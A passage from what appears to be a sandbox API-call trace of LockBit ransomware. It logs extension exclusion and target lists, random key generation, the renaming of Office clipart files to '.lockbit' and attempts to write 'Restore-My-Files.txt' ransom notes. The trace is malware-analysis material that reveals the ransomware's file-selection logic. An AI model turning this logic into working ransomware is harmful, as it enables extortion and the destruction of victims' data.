lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.528] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.528] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.528] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF.lockbit") returned 68 [0173.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\prrt.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.530] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.530] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.530] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3830) returned 1 [0173.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.531] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.532] malloc (_Size=0x9e) returned 0x2073f40 [0173.532] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9e, FileInformationClass=0xa) returned 0x0 [0173.533] free (_Block=0x2073f40) [0173.533] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.533] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.534] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x7aac, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRRTINST.WMF", cAlternateFileName="")) returned 1 [0173.534] lstrcmpiW (lpString1=".", lpString2="PRRTINST.WMF") returned -1 [0173.534] lstrcmpiW (lpString1="..", lpString2="PRRTINST.WMF") returned -1 [0173.534] PathFindExtensionW (pszPath="PRRTINST.WMF") returned=".WMF" [0173.534] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.534] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.535] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.535] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PRRTINST.WMF") returned 1 [0173.535] lstrcmpiW (lpString1="ntldr", lpString2="PRRTINST.WMF") returned -1 [0173.535] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PRRTINST.WMF") returned -1 [0173.535] lstrcmpiW (lpString1="bootsect.bak", lpString2="PRRTINST.WMF") returned -1 [0173.535] lstrcmpiW (lpString1="autorun.inf", lpString2="PRRTINST.WMF") returned -1 [0173.535] lstrcmpiW (lpString1="thumbs.db", lpString2="PRRTINST.WMF") returned 1 [0173.536] lstrcmpiW (lpString1="iconcache.db", lpString2="PRRTINST.WMF") returned -1 [0173.536] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.536] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF") returned=".WMF" [0173.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.536] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.536] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.537] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.537] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF.lockbit") returned 72 [0173.537] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\prrtinst.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.537] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.538] malloc (_Size=0x40068) returned 0x3d70450 [0173.538] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31404) returned 1 [0173.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.538] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.542] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.542] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.543] free (_Block=0x1fa2ed8) [0173.543] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.543] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.543] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.543] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSRETRO.WMF", cAlternateFileName="")) returned 1 [0173.543] lstrcmpiW (lpString1=".", lpString2="PSRETRO.WMF") returned -1 [0173.543] lstrcmpiW (lpString1="..", lpString2="PSRETRO.WMF") returned -1 [0173.543] PathFindExtensionW (pszPath="PSRETRO.WMF") returned=".WMF" [0173.543] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.543] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.543] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.544] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.544] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PSRETRO.WMF") returned 1 [0173.545] lstrcmpiW (lpString1="ntldr", lpString2="PSRETRO.WMF") returned -1 [0173.545] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PSRETRO.WMF") returned -1 [0173.545] lstrcmpiW (lpString1="bootsect.bak", lpString2="PSRETRO.WMF") returned -1 [0173.545] lstrcmpiW (lpString1="autorun.inf", lpString2="PSRETRO.WMF") returned -1 [0173.545] lstrcmpiW (lpString1="thumbs.db", lpString2="PSRETRO.WMF") returned 1 [0173.545] lstrcmpiW (lpString1="iconcache.db", lpString2="PSRETRO.WMF") returned -1 [0173.545] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.545] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF") returned=".WMF" [0173.545] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.545] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.546] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.546] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.546] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF.lockbit") returned 71 [0173.547] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\psretro.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.550] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.550] malloc (_Size=0x40068) returned 0x3ef0008 [0173.551] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=982) returned 1 [0173.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.552] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0173.554] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.554] malloc (_Size=0xa4) returned 0x1fa2ed8 [0173.554] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0173.555] free (_Block=0x1fa2ed8) [0173.555] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.555] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.555] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.555] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSSKETLG.WMF", cAlternateFileName="")) returned 1 [0173.555] lstrcmpiW (lpString1=".", lpString2="PSSKETLG.WMF") returned -1 [0173.555] lstrcmpiW (lpString1="..", lpString2="PSSKETLG.WMF") returned -1 [0173.555] PathFindExtensionW (pszPath="PSSKETLG.WMF") returned=".WMF" [0173.555] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".diagcab", 